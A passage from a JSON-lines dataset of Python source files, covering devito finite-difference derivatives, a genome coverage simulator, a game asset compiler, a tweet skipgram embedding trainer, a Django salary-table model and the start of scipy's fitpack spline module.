Side, optional\n Side of the finite difference location, centered (at x), left (at x - 1)\n or right (at x +1). Defaults to ``centered``.\n transpose : Transpose, optional\n Forward (matvec=direct) or transpose (matvec=transpose) mode of the\n finite difference. Defaults to ``direct``.\n subs : dict, optional\n Substitutions to apply to the finite-difference expression after evaluation.\n x0 : dict, optional\n Origin (where the finite-difference is evaluated at) for the finite-difference\n scheme, e.g. {x: x, y: y + h_y/2}.\n\n Examples\n --------\n Creation\n\n >>> from devito import Function, Derivative, Grid\n >>> grid = Grid((10, 10))\n >>> x, y = grid.dimensions\n >>> u = Function(name=\"u\", grid=grid, space_order=2)\n >>> Derivative(u, x)\n Derivative(u(x, y), x)\n\n This can also be obtained via the differential shortcut\n\n >>> u.dx\n Derivative(u(x, y), x)\n\n You can also specify the order as a keyword argument\n\n >>> Derivative(u, x, deriv_order=2)\n Derivative(u(x, y), (x, 2))\n\n Or as a tuple\n\n >>> Derivative(u, (x, 2))\n Derivative(u(x, y), (x, 2))\n\n Once again, this can be obtained via shortcut notation\n\n >>> u.dx2\n Derivative(u(x, y), (x, 2))\n\n Derivative object are also callable to change default setup:\n\n >>> u.dx2(x0=x + x.spacing)\n Derivative(u(x, y), (x, 2))\n\n will create the second derivative at x=x + x.spacing. Accepted arguments for dynamic\n evaluation are `x0`, `fd_order` and `side`.\n \"\"\"\n\n _state = ('expr', 'dims', 'side', 'fd_order', 'transpose', '_ppsubs', 'x0')\n _fd_priority = 3\n\n def __new__(cls, expr, *dims, **kwargs):\n if type(expr) == sympy.Derivative:\n raise ValueError(\"Cannot nest sympy.Derivative with devito.Derivative\")\n if not isinstance(expr, Differentiable):\n raise ValueError(\"`expr` must be a Differentiable object\")\n\n new_dims, orders, fd_o, var_count = cls._process_kwargs(expr, *dims, **kwargs)\n\n # Construct the actual Derivative object\n obj = Differentiable.__new__(cls, expr, *var_count)\n obj._dims = tuple(OrderedDict.fromkeys(new_dims))\n\n skip = kwargs.get('preprocessed', False) or obj.ndims == 1\n\n obj._fd_order = fd_o if skip else DimensionTuple(*fd_o, getters=obj._dims)\n obj._deriv_order = orders if skip else DimensionTuple(*orders, getters=obj._dims)\n obj._side = kwargs.get(\"side\")\n obj._transpose = kwargs.get(\"transpose\", direct)\n obj._ppsubs = as_tuple(frozendict(i) for i in kwargs.get(\"subs\", []))\n obj._x0 = frozendict(kwargs.get('x0', {}))\n return obj\n\n @classmethod\n def _process_kwargs(cls, expr, *dims, **kwargs):\n \"\"\"\n Process arguments for the construction of a Derivative\n \"\"\"\n # Skip costly processing if constructiong from preprocessed\n if kwargs.get('preprocessed', False):\n fd_orders = kwargs.get('fd_order')\n deriv_orders = kwargs.get('deriv_order')\n if len(dims) == 1:\n dims = tuple([dims[0]]*deriv_orders)\n variable_count = [sympy.Tuple(s, dims.count(s))\n for s in filter_ordered(dims)]\n return dims, deriv_orders, fd_orders, variable_count\n # Check `dims`. It can be a single Dimension, an iterable of Dimensions, or even\n # an iterable of 2-tuple (Dimension, deriv_order)\n if len(dims) == 0:\n raise ValueError(\"Expected Dimension w.r.t. which to differentiate\")\n elif len(dims) == 1:\n if isinstance(dims[0], Iterable):\n # Iterable of Dimensions\n if len(dims[0]) != 2:\n raise ValueError(\"Expected `(dim, deriv_order)`, got %s\" % dims[0])\n orders = kwargs.get('deriv_order', dims[0][1])\n if dims[0][1] != orders:\n raise ValueError(\"Two different values of `deriv_order`\")\n new_dims = tuple([dims[0][0]]*dims[0][1])\n else:\n # Single Dimension\n orders = kwargs.get('deriv_order', 1)\n if isinstance(orders, Iterable):\n orders = orders[0]\n new_dims = tuple([dims[0]]*orders)\n else:\n # Iterable of 2-tuple, e.g. ((x, 2), (y, 3))\n new_dims = []\n orders = []\n d_ord = kwargs.get('deriv_order', tuple([1]*len(dims)))\n for d, o in zip(dims, d_ord):\n if isinstance(d, Iterable):\n new_dims.extend([d[0] for _ in range(d[1])])\n orders.append(d[1])\n else:\n new_dims.extend([d for _ in range(o)])\n orders.append(o)\n new_dims = as_tuple(new_dims)\n orders = as_tuple(orders)\n\n # Finite difference orders depending on input dimension (.dt or .dx)\n fd_orders = kwargs.get('fd_order', tuple([expr.time_order if\n getattr(d, 'is_Time', False) else\n expr.space_order for d in dims]))\n if len(dims) == 1 and isinstance(fd_orders, Iterable):\n fd_orders = fd_orders[0]\n\n # SymPy expects the list of variable w.r.t. which we differentiate to be a list\n # of 2-tuple `(s, count)` where s is the entity to diff wrt and count is the order\n # of the derivative\n variable_count = [sympy.Tuple(s, new_dims.count(s))\n for s in filter_ordered(new_dims)]\n return new_dims, orders, fd_orders, variable_count\n\n def __call__(self, x0=None, fd_order=None, side=None):\n if self.ndims == 1:\n _fd_order = fd_order or self._fd_order\n _side = side or self._side\n new_x0 = {self.dims[0]: x0} if x0 is not None else self.x0\n return self._new_from_self(fd_order=_fd_order, side=_side, x0=new_x0)\n\n if side is not None:\n raise TypeError(\"Side only supported for first order single\"\n \"Dimension derivative such as `.dxl` or .dx(side=left)\")\n # Cross derivative\n _x0 = dict(self._x0)\n _fd_order = dict(self.fd_order._getters)\n try:\n _fd_order.update(**(fd_order or {}))\n _fd_order = tuple(_fd_order.values())\n _fd_order = DimensionTuple(*_fd_order, getters=self.dims)\n _x0.update(x0)\n except AttributeError:\n raise TypeError(\"Multi-dimensional Derivative, input expected as a dict\")\n\n return self._new_from_self(fd_order=_fd_order, x0=_x0)\n\n def _new_from_self(self, **kwargs):\n expr = kwargs.pop('expr', self.expr)\n _kwargs = {'deriv_order': self.deriv_order, 'fd_order': self.fd_order,\n 'side': self.side, 'transpose': self.transpose, 'subs': self._ppsubs,\n 'x0': self.x0, 'preprocessed': True}\n _kwargs.update(**kwargs)\n return Derivative(expr, *self.dims, **_kwargs)\n\n @property\n def func(self):\n return lambda *a, **kw: self._new_from_self(expr=a[0], **kw)\n\n def subs(self, *args, **kwargs):\n \"\"\"\n Bypass sympy.Subs as Devito has its own lazy evaluation mechanism.\n \"\"\"\n try:\n rules = dict(*args)\n except TypeError:\n rules = dict((args,))\n kwargs.pop('simultaneous', None)\n return self.xreplace(rules, **kwargs)\n\n def _xreplace(self, subs):\n \"\"\"\n This is a helper method used internally by SymPy. We exploit it to postpone\n substitutions until evaluation.\n \"\"\"\n subs = self._ppsubs + (subs,) # Postponed substitutions\n return self._new_from_self(subs=subs), True\n\n @cached_property\n def _metadata(self):\n state = list(self._state)\n state.remove('expr')\n ret = [getattr(self, i) for i in state]\n ret.append(self.expr.staggered or (None,))\n return tuple(ret)\n\n @property\n def dims(self):\n return self._dims\n\n @property\n def ndims(self):\n return len(self._dims)\n\n @property\n def x0(self):\n return self._x0\n\n @property\n def fd_order(self):\n return self._fd_order\n\n @property\n def deriv_order(self):\n return self._deriv_order\n\n @property\n def side(self):\n return self._side\n\n @property\n def transpose(self):\n return self._transpose\n\n @property\n def is_TimeDependent(self):\n return self.expr.is_TimeDependent\n\n @property\n def T(self):\n \"\"\"Transpose of the Derivative.\n\n FD derivatives can be represented as matrices and have adjoint/transpose.\n This is really useful for more advanced FD definitions. For example\n the conventional Laplacian is `.dxl.T * .dxl`\n \"\"\"\n if self._transpose == direct:\n adjoint = transpose\n else:\n adjoint = direct\n\n return self._new_from_self(transpose=adjoint)\n\n def _eval_at(self, func):\n \"\"\"\n Evaluates the derivative at the location of `func`. It is necessary for staggered\n setup where one could have Eq(u(x + h_x/2), v(x).dx)) in which case v(x).dx\n has to be computed at x=x + h_x/2.\n \"\"\"\n # If an x0 already exists do not overwrite it\n x0 = self.x0 or dict(func.indices_ref._getters)\n if self.expr.is_Add:\n # If `expr` has both staggered and non-staggered terms such as\n # `(u(x + h_x/2) + v(x)).dx` then we exploit linearity of FD to split\n # it into `u(x + h_x/2).dx` and `v(x).dx`, since they require\n # different FD indices\n mapper = as_mapper(self.expr._args_diff, lambda i: i.staggered)\n args = [self.expr.func(*v) for v in mapper.values()]\n args.extend([a for a in self.expr.args if a not in self.expr._args_diff])\n args = [self._new_from_self(expr=a, x0=x0) for a in args]\n return self.expr.func(*args)\n elif self.expr.is_Mul:\n # For Mul, We treat the basic case `u(x + h_x/2) * v(x) which is what appear\n # in most equation with div(a * u) for example. The expression is re-centered\n # at the highest priority index (see _gather_for_diff) to compute the\n # derivative at x0.\n return self._new_from_self(x0=x0, expr=self.expr._gather_for_diff)\n else:\n # For every other cases, that has more functions or more complexe arithmetic,\n # there is not actual way to decide what to do so it’s as safe to use\n # the expression as is.\n return self._new_from_self(x0=x0)\n\n @property\n def evaluate(self):\n # Evaluate finite-difference.\n # NOTE: `evaluate` and `_eval_fd` split for potential future different\n # types of discretizations\n return self._eval_fd(self.expr)\n\n @property\n def _eval_deriv(self):\n return self._eval_fd(self.expr)\n\n def _eval_fd(self, expr):\n \"\"\"\n Evaluate the finite-difference approximation of the Derivative.\n Evaluation is carried out via the following three steps:\n\n - 1: Evaluate derivatives within the expression. For example given\n `f.dx * g`, `f.dx` will be evaluated first.\n - 2: Evaluate the finite difference for the (new) expression.\n This in turn is a two-step procedure, for Functions that may\n may need to be evaluated at a different point due to e.g. a\n shited derivative.\n - 3: Apply substitutions.\n \"\"\"\n # Step 1: Evaluate derivatives within expression\n try:\n expr = expr._eval_deriv\n except AttributeError:\n pass\n\n # Step 2: Evaluate FD of the new expression\n if self.side is not None and self.deriv_order == 1:\n res = first_derivative(expr, self.dims[0], self.fd_order,\n side=self.side, matvec=self.transpose,\n x0=self.x0)\n elif len(self.dims) > 1:\n res = cross_derivative(expr, self.dims, self.fd_order, self.deriv_order,\n matvec=self.transpose, x0=self.x0)\n else:\n res = generic_derivative(expr, *self.dims, self.fd_order, self.deriv_order,\n matvec=self.transpose, x0=self.x0)\n\n # Step 3: Apply substitutions\n for e in self._ppsubs:\n res = res.xreplace(e)\n\n return res\n\n\nclass Weights(Array):\n\n \"\"\"\n The weights (or coefficients) of a finite-difference expansion.\n \"\"\"\n\n def __init_finalize__(self, *args, **kwargs):\n dimensions = as_tuple(kwargs.get('dimensions'))\n weights = kwargs.get('initvalue')\n\n assert len(dimensions) == 1\n d = dimensions[0]\n assert isinstance(d, StencilDimension) and d.symbolic_size == len(weights)\n assert isinstance(weights, (list, tuple, np.ndarray))\n\n kwargs['scope'] = 'static'\n\n super().__init_finalize__(*args, **kwargs)\n\n @property\n def dimension(self):\n return self.dimensions[0]\n\n weights = Array.initvalue\n"} {"ext": "py", "sha": "1a30e5b4cc1ec8cf662272ff61dfa7f1fa47b9da", "content": "#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nuntitled.py\n\nCreated by Olivier Huin on 2010-02-20.\nCopyright (c) 2010 Flarebyte.com Limited. All rights reserved.\n\"\"\"\n\nimport sys\nimport os\n\nactivitykinds={\n('shortid', 'uuid', 'visiting', 'visiting', ['visiting']),\n('shortid', 'uuid', 'booking', 'booking', ['booking']),\n('shortid', 'uuid', 'learning', 'learning', ['learning']),\n('shortid', 'uuid', 'eating', 'eating', ['eating']),\n('shortid', 'uuid', 'drinking', 'drinking', ['drinking']),\n('shortid', 'uuid', 'volunteering', 'volunteering', ['volunteering']),\n('shortid', 'uuid', 'fundraising', 'fundraising', ['fundraising']),\n\n}\n"} {"ext": "py", "sha": "1a30e65961d5c26c1690ebb3f1d085d6c8241ea4", "content": "#!/usr/bin/env python3\n\n# Write a program that simulates random BAC coverage over a genome\n# Command line arguments include\n# \tGenome size (e.g. 1000)\n# \tX coverage (e.g. 5)\n# Use assert() to check parameter bounds\n# Report min, max, and histogram of coverage\n# Note that your output may vary due to random function\n\nimport sys\nimport random\n\nassert(len(sys.argv) == 3)\nbins = int(sys.argv[1])\nx = float(sys.argv[2])\nassert(bins > 0)\nassert(x > 0)\n\nbacs = int(bins * x)\ngenome = [0] * bins\n#1st array\nfor i in range(bacs):\n r = random.randint(0, bins -1)\n genome[r] += 1 \ngenome.sort()\nmin = genome[0]\nmax = genome[-1]\n\n#2nd array\nhist = [0] * (max + 1)\nfor v in genome:\n hist[v] += 1\n\n#output\nprint(f'Size: {bins}')\nprint(f'X: {x}')\nprint(f'BACs: {bacs}')\nprint(f'Min: {genome[0]}')\nprint(f'Max: {genome[-1]}')\nprint(f'Counts:')\nfor i in range(len(hist)):\n print(i, hist[i])\n\n\"\"\"\nSize: 1000\nX: 5.0\nBACs: 5000\nMin: 0\nMax: 13\nCounts:\n0 5\n1 39\n2 88\n3 144\n4 175\n5 150\n6 151\n7 116\n8 59\n9 40\n10 20\n11 5\n12 6\n13 2\n\"\"\"\n"} {"ext": "py", "sha": "1a30e709ba83c0d2e9d1a7afd432a1c711a977bb", "content": "import logging\nfrom typing import Any, Dict, List, TypedDict\n\nfrom utility import Utility\n\nlog: logging.Logger = logging.getLogger(__name__)\n\n\nclass CamoIDs(TypedDict):\n \"\"\"Structure of loot/camo_ids.csv\"\"\"\n\n id: int\n ref: str\n rarity: int\n price: int\n salvage: int\n license: int\n premium: int # bool\n\n\nclass CamoTable(TypedDict):\n \"\"\"Structure of mp/camotable.csv\"\"\"\n\n index: int\n ref: str\n botValid: int # bool\n category: str\n unlockType: str\n unlockString: str\n hideInUI: int # bool\n name: str\n image: str\n availableOffline: int # bool\n platformExclusiveType: str\n\n\nclass Camos:\n \"\"\"Camo XAssets.\"\"\"\n\n def Compile(self: Any) -> None:\n \"\"\"Compile the Camo XAssets.\"\"\"\n\n camos: List[Dict[str, Any]] = []\n\n camos = Camos.IDs(self, camos)\n camos = Camos.Table(self, camos)\n\n Utility.WriteFile(self, f\"{self.eXAssets}/camos.json\", camos)\n\n log.info(f\"Compiled {len(camos):,} Camos\")\n\n def IDs(self: Any, camos: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n \"\"\"Compile the loot/camo_ids.csv XAsset.\"\"\"\n\n ids: List[Dict[str, Any]] = Utility.ReadCSV(\n self, f\"{self.iXAssets}/loot/camo_ids.csv\", CamoIDs\n )\n\n if ids is None:\n return camos\n\n for entry in ids:\n camos.append(\n {\n \"id\": entry.get(\"id\"),\n \"altId\": entry.get(\"ref\"),\n \"name\": None,\n \"category\": None,\n \"type\": self.ModernWarfare.GetLootType(entry.get(\"id\")),\n \"rarity\": self.ModernWarfare.GetLootRarity(entry.get(\"rarity\")),\n \"season\": self.ModernWarfare.GetLootSeason(entry.get(\"license\")),\n \"exclusive\": None,\n \"available\": self.ModernWarfare.GetTitleAvailability(\n entry.get(\"id\")\n ),\n \"hidden\": None,\n \"image\": None,\n }\n )\n\n return camos\n\n def Table(self: Any, camos: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n \"\"\"Compile the mp/camotable.csv XAsset.\"\"\"\n\n table: List[Dict[str, Any]] = Utility.ReadCSV(\n self, f\"{self.iXAssets}/mp/camotable.csv\", CamoTable\n )\n\n if table is None:\n return camos\n\n for camo in camos:\n for entry in table:\n if camo.get(\"altId\") != entry.get(\"ref\"):\n continue\n\n camo[\"name\"] = self.localize.get(entry.get(\"name\"))\n camo[\"category\"] = self.ModernWarfare.GetCamoCategory(\n entry.get(\"category\")\n )\n camo[\"exclusive\"] = self.ModernWarfare.GetPlatformExclusivity(\n entry.get(\"platformExclusiveType\")\n )\n camo[\"hidden\"] = bool(entry.get(\"hidden\"))\n camo[\"image\"] = entry.get(\"image\")\n\n return camos\n"} {"ext": "py", "sha": "1a30e7652169a437c848f9b1ca1c98927301347f", "content": "class Pagelet(object):\r\n\r\n def __init__(self, parent_request, target_element_id, route_view, params, method: str = 'GET', depends_on: str= None):\r\n self.parent_request = parent_request\r\n self.target = target_element_id\r\n self.route_view = route_view\r\n self.params = params\r\n self.method = method\r\n self.depends_on = depends_on\r\n\r\n def render(self):\r\n return self.route_view(self.parent_request, **self.params)\r\n"} {"ext": "py", "sha": "1a30e871a167b1e77ffaf8a14121b8009989b2a7", "content": "import numpy as np\nimport pandas as pd\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom tensorflow.keras.preprocessing.sequence import skipgrams\nfrom keras.utils import np_utils\nfrom keras.preprocessing.sequence import make_sampling_table\nimport scipy.io as sio\nimport os\n\n\ndef train(cleaned_tweets, tweets, hashtags, sentiment, source_idx, target_idx):\n # Obtain skipgram embedding only\n # Create feature representation: TFIDF-Variants and skipgram embedding with 1000 dimension and negative sampling\n # Output will be saved to disk\n # get_glove_embedding_matrix(cleaned_tweets)\n # get_skipgram_gensim_embedding_matrix(cleaned_tweets)\n\n # Sentence Skipgram is the base feature representation of the datatset\n X = get_skipgram_sentence_embedding_matrix(cleaned_tweets)\n\n # Create bytes file for the visualization\n X.dtype=np.float32\n X.tofile(\"data/skipgram_tensors.bytes\")\n\n create_domain_adaptation_dataset(X, tweets, source_idx, target_idx, sentiment)\n\n\ndef get_skipgram_sentence_embedding_matrix(text, dim=200, batch_size=256, window_size=5, epochs=1):\n print(\"get_skipgram_sentence_embedding_matrix\")\n if os.path.isfile(\"data/sentqs_skipgram_sentence_embedding.npz\"):\n loaded_embedding = np.load(\"data/sentqs_skipgram_sentence_embedding.npz\")\n loaded_embedding = loaded_embedding[\"embedding\"]\n print('Loaded Skipgram embedding.')\n return loaded_embedding\n else:\n text = [''.join(x) for x in text]\n t = Tokenizer()\n t.fit_on_texts(text)\n corpus = t.texts_to_sequences(text)\n # print(corpus)\n V = len(t.word_index)\n step_size = len(corpus) // batch_size\n model = Sequential()\n model.add(Dense(units=dim, input_dim=V, activation=\"softmax\"))\n model.add(Dense(units=V, input_dim=dim, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n model.summary()\n\n model.fit(generate_data(corpus, window_size, V), epochs=epochs, steps_per_epoch=step_size)\n # model.save(\"data/sentqs_full_skigram_arc.h5\")\n mlb = MultiLabelBinarizer()\n enc = mlb.fit_transform(corpus)\n emb = enc @ model.get_weights()[0]\n np.savez_compressed(\"data/sentqs_skipgram_sentence_embedding\", embedding=emb)\n return emb\n\n\ndef create_domain_adaptation_dataset(X, tweets, source_idx, target_idx, sentiment):\n Xs = X[source_idx]\n Xt = X[target_idx]\n Ys = sentiment[source_idx]\n Yt = sentiment[target_idx]\n data = [Xs, Ys, Xt, Yt]\n np.savez('data/sentqs_dataset.npz', *data)\n sio.savemat('data/sentqs_dataset.mat', {'Xs': Xs, 'Xt': Xt, 'Ys': Ys, 'Yt': Yt})\n source_tweets = [tweets[i] for i in source_idx]\n target_tweets = [tweets[i] for i in target_idx]\n\n pd.DataFrame(source_tweets).to_csv(\"data/sentqs_source_tweets.csv\")\n pd.DataFrame(target_tweets).to_csv(\"data/sentqs_target_tweets.csv\")\n return Xs, Ys, Xt, Yt\n\n\ndef generate_data(corpus, window_size, V):\n for words in corpus:\n couples, labels = skipgrams(words, V, window_size, negative_samples=1, shuffle=True,\n sampling_table=make_sampling_table(V, sampling_factor=1e-05))\n if couples:\n X, y = zip(*couples)\n X = np_utils.to_categorical(X, V)\n y = np_utils.to_categorical(y, V)\n yield X, y\n"} {"ext": "py", "sha": "1a30e8d20a58f8425ab9facc0fa55f1e3ed9bfef", "content": "from commndata.models import TimeLinedTable\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom enum import Enum\n\n\nclass SalaryTable(TimeLinedTable):\n class SALARY_TABLE(models.IntegerChoices):\n GS1 = (1010, '行(一)')\n GS2 = (1020, '行(二)')\n SGS = (1110, '専門行政')\n ZM = (1210, '税務')\n KA1 = (1310, '公安(一)')\n KA2 = (1320, '公安(二)')\n KJ1 = (1410, '海(一)')\n KJ2 = (1420, '海(二)')\n KI1 = (1510, '教(一)')\n KI2 = (1520, '教(二)')\n KK = (1610, '研究')\n IR1 = (1710, '医(一)')\n IR2 = (1720, '医(二)')\n IR3 = (1730, '医(三)')\n FS = (1810, '福祉')\n NK1 = (1910, '任研(一)') # 任期付き研究員\n NK2 = (1920, '任研(二)')\n TNK = (1930, '特任研') # 特定任期付き研究員\n SS = (2010, '専門スタッフ')\n ST = (2110, '指定職') # 指定職\n\n class STAFF_TYPE(models.IntegerChoices):\n TY = (1, '定員')\n SNY = (2, '再任用')\n\n salary_table = models.IntegerField(verbose_name=_('salary table'), blank=False,\n choices=SALARY_TABLE.choices, default=SALARY_TABLE.GS1) # 俸給表\n salary_level = models.IntegerField(verbose_name=_('salary level')) # 級\n salary_no = models.IntegerField(verbose_name=_('salary no')) # 号俸\n salary_monthly = models.IntegerField(verbose_name=_('salary monthly')) # 俸給月額\n salary_adjustment = models.IntegerField(verbose_name=_('salary adjustment')) # 俸給の調整額\n \n @property\n def sny_salary_no():\n \"\"\"\n 再任用職員の号俸\n \"\"\"\n return 999\n\n class Meta:\n permissions = [\n ('import_salary_table', 'Can import salary_table'),\n ('export_salary_table', 'Can export salary_table'),\n ]\n verbose_name = _('salary table')\n verbose_name_plural = _('salary table')\n constraints = [\n models.UniqueConstraint(name='salary_table_unique', fields = ['start_date', 'salary_table', 'salary_level', 'salary_adjustment']), \n ]\n ordering = ['-start_date', 'salary_table', 'salary_level', 'salary_no']\n \n def __str__(self):\n return self.salary_table\n\nclass SalaryTableExcel(TimeLinedTable):\n salary_table = models.IntegerField(verbose_name=_('salary table'), blank=False,\n choices=SalaryTable.SALARY_TABLE.choices, default=SalaryTable.SALARY_TABLE.GS1) # 俸給表\n sheet_name = models.CharField(max_length=10, verbose_name=_('シート名'))\n rows = models.IntegerField(verbose_name=_('級'), default=1)\n cols = models.IntegerField(verbose_name=_('号俸'), default=1)\n sny_flg = models.BooleanField(verbose_name=_('再任用有無'), default=True)\n start_cell = models.CharField(max_length=10, verbose_name=_('データ開始セル'))\n\n class Meta:\n db_table = 'salary_table_excel'\n verbose_name = _('俸給表取込エクセル設定')\n verbose_name_plural = _('俸給表取込エクセル設定')\n constraints = [\n models.UniqueConstraint(name='salary_table_excel_unique', fields = ['start_date', 'salary_table',]), \n ]\n ordering = ['-start_date', 'salary_table', ]\n"} {"ext": "py", "sha": "1a30e926fcd000f43102fb752e44a5336141a0cd", "content": "# from electrum_vtc.i18n import _\n# \n# fullname = _('Two Factor Authentication')\n# description = ''.join([\n# _(\"This plugin adds two-factor authentication to your wallet.\"), '<br/>',\n# _(\"For more information, visit\"),\n# \" <a href=\\\"https://api.trustedcoin.com/#/electrum-help\\\">https://api.trustedcoin.com/#/electrum-help</a>\"\n# ])\n# requires_wallet_type = ['2fa']\n# registers_wallet_type = '2fa'\n# available_for = ['qt', 'cmdline', 'kivy']\n"} {"ext": "py", "sha": "1a30ea2e7047e2719bac3d3d2a071f5de7e58fc5", "content": "\"\"\"\nfitpack --- curve and surface fitting with splines\n\nfitpack is based on a collection of Fortran routines DIERCKX\nby P. Dierckx (see http://www.netlib.org/dierckx/) transformed\nto double routines by Pearu Peterson.\n\"\"\"\n# Created by Pearu Peterson, June,August 2003\nfrom __future__ import division, print_function, absolute_import\n\n__all__ = [\n 'UnivariateSpline',\n 'InterpolatedUnivariateSpline',\n 'LSQUnivariateSpline',\n 'BivariateSpline',\n 'LSQBivariateSpline',\n 'SmoothBivariateSpline',\n 'LSQSphereBivariateSpline',\n 'SmoothSphereBivariateSpline',\n 'RectBivariateSpline',\n 'RectSphereBivariateSpline']\n\n\nimport warnings\n\nfrom numpy import zeros, concatenate, alltrue, ravel, all, diff, array, ones\nimport numpy as np\n\nfrom . import fitpack\nfrom . import dfitpack\n\n\n################ Univariate spline ####################\n\n_curfit_messages = {1:\"\"\"\nThe required storage space exceeds the available storage space, as\nspecified by the parameter nest: nest too small. If nest is already\nlarge (say nest > m/2), it may also indicate that s is too small.\nThe approximation returned is the weighted least-squares spline\naccording to the knots t[0],t[1],...,t[n-1]. (n=nest) the parameter fp\ngives the corresponding weighted sum of squared residuals (fp>s).\n\"\"\",\n 2:\"\"\"\nA theoretically impossible result was found during the iteration\nproces for finding a smoothing spline with fp = s: s too small.\nThere is an approximation returned but the corresponding weighted sum\nof squared residuals does not satisfy the condition abs(fp-s)/s < tol.\"\"\",\n 3:\"\"\"\nThe maximal number of iterations maxit (set to 20 by the program)\nallowed for finding a smoothing spline with fp=s has been reached: s\ntoo small.\nThere is an approximation returned but the corresponding weighted sum\nof squared residuals does not satisfy the condition abs(fp-s)/s < tol.\"\"\",\n 10:\"\"\"\nError on entry, no approximation returned. The following conditions\nmust hold:\nxb<=x[0]<x[1]<...<x[m-1]<=xe, w[i]>0, i=0..m-1\nif iopt=-1:\n xb<t[k+1]<t[k+2]<...<t[n-k-2]<xe\"\"\"\n }\n\n\n# UnivariateSpline, ext parameter can be an int or a string\n_extrap_modes = {0: 0, 'extrapolate': 0,\n 1: 1, 'zeros': 1,\n 2: 2, 'raise': 2,\n 3: 3, 'const': 3}\n\n\nclass UnivariateSpline(object):\n \"\"\"\n One-dimensional smoothing spline fit to a given set of data points.\n\n Fits a spline y = spl(x) of degree `k` to the provided `x`, `y` data. `s`\n specifies the number of knots by specifying a smoothing condition.\n\n Parameters\n ----------\n x : (N,) array_like\n 1-D array of independent input data. Must be increasing.\n y : (N,) array_like\n 1-D array of dependent input data, of the same length as `x`.\n w : (N,) array_like, optional\n Weights for spline fitting. Must be positive. If None (default),\n weights are all equal.\n bbox : (2,) array_like, optional\n 2-sequence specifying the boundary of the approximation interval. If\n None (default), ``bbox=[x[0], x[-1]]``.\n k : int, optional\n Degree of the smoothing spline. Must be <= 5.\n Default is k=3, a cubic spline.\n s : float or None, optional\n Positive smoothing factor used to choose the number of knots. Number\n of knots will be increased until the smoothing condition is satisfied::\n\n sum((w[i] * (y[i]-spl(x[i])))**2, axis=0) <= s\n\n If None (default), ``s = len(w)`` which should be a good value if\n ``1/w[i]`` is an estimate of the standard deviation of ``y[i]``.\n If 0, spline will interpolate through all data points.\n ext : int or str, optional\n Controls the extrapolation mode for elements\n not in the interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 of 'const', return the boundary value.\n\n The default value is 0.\n\n check_finite : bool, optional\n Whether to check that the input arrays contain only finite numbers.\n Disabling may give a performance gain, but may result in problems\n (crashes, non-termination or non-sensical results) if the inputs\n do contain infinities or NaNs.\n Default is False.\n\n See Also\n --------\n InterpolatedUnivariateSpline : Subclass with smoothing forced to 0\n LSQUnivariateSpline : Subclass in which knots are user-selected instead of\n being set by smoothing condition\n splrep : An older, non object-oriented wrapping of FITPACK\n splev, sproot, splint, spalde\n BivariateSpline : A similar class for two-dimensional spline interpolation\n\n Notes\n -----\n The number of data points must be larger than the spline degree `k`.\n\n **NaN handling**: If the input arrays contain ``nan`` values, the result\n is not useful, since the underlying spline fitting routines cannot deal\n with ``nan`` . A workaround is to use zero weights for not-a-number\n data points:\n\n >>> from scipy.interpolate import UnivariateSpline\n >>> x, y = np.array([1, 2, 3, 4]), np.array([1, np.nan, 3, 4])\n >>> w = np.isnan(y)\n >>> y[w] = 0.\n >>> spl = UnivariateSpline(x, y, w=~w)\n\n Notice the need to replace a ``nan`` by a numerical value (precise value\n does not matter as long as the corresponding weight is zero.)\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(-3, 3, 50)\n >>> y = np.exp(-x**2) + 0.1 * np.random.randn(50)\n >>> plt.plot(x, y, 'ro', ms=5)\n\n Use the default value for the smoothing parameter:\n\n >>> spl = UnivariateSpline(x, y)\n >>> xs = np.linspace(-3, 3, 1000)\n >>> plt.plot(xs, spl(xs), 'g', lw=3)\n\n Manually change the amount of smoothing:\n\n >>> spl.set_smoothing_factor(0.5)\n >>> plt.plot(xs, spl(xs), 'b', lw=3)\n >>> plt.show()\n\n \"\"\"\n def __init__(self, x, y, w=None, bbox=[None]*2, k=3, s=None,\n ext=0, check_finite=False):\n\n if check_finite:\n if not np.isfinite(x).all() or not np.isfinite(y).all():\n raise ValueError(\"x and y array must not contain NaNs or infs.\")\n\n # _data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n try:\n self.ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n\n data = dfitpack.fpcurf0(x,y,k,w=w,\n xb=bbox[0],xe=bbox[1],s=s)\n if data[-1] == 1:\n # nest too small, setting to maximum bound\n data = self._reset_nest(data)\n self._data = data\n self._reset_class()\n\n @classmethod\n def _from_tck(cls, tck, ext=0):\n \"\"\"Construct a spline object from given tck\"\"\"\n self = cls.__new__(cls)\n t, c, k = tck\n self._eval_args = tck\n #_data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n self._data = (None,None,None,None,None,k,None,len(t),t,\n c,None,None,None,None)\n self.ext = ext\n return self\n\n def _reset_class(self):\n data = self._data\n n,t,c,k,ier = data[7],data[8],data[9],data[5],data[-1]\n self._eval_args = t[:n],c[:n],k\n if ier == 0:\n # the spline returned has a residual sum of squares fp\n # such that abs(fp-s)/s <= tol with tol a relative\n # tolerance set to 0.001 by the program\n pass\n elif ier == -1:\n # the spline returned is an interpolating spline\n self._set_class(InterpolatedUnivariateSpline)\n elif ier == -2:\n # the spline returned is the weighted least-squares\n # polynomial of degree k. In this extreme case fp gives\n # the upper bound fp0 for the smoothing factor s.\n self._set_class(LSQUnivariateSpline)\n else:\n # error\n if ier == 1:\n self._set_class(LSQUnivariateSpline)\n message = _curfit_messages.get(ier,'ier=%s' % (ier))\n warnings.warn(message)\n\n def _set_class(self, cls):\n self._spline_class = cls\n if self.__class__ in (UnivariateSpline, InterpolatedUnivariateSpline,\n LSQUnivariateSpline):\n self.__class__ = cls\n else:\n # It's an unknown subclass -- don't change class. cf. #731\n pass\n\n def _reset_nest(self, data, 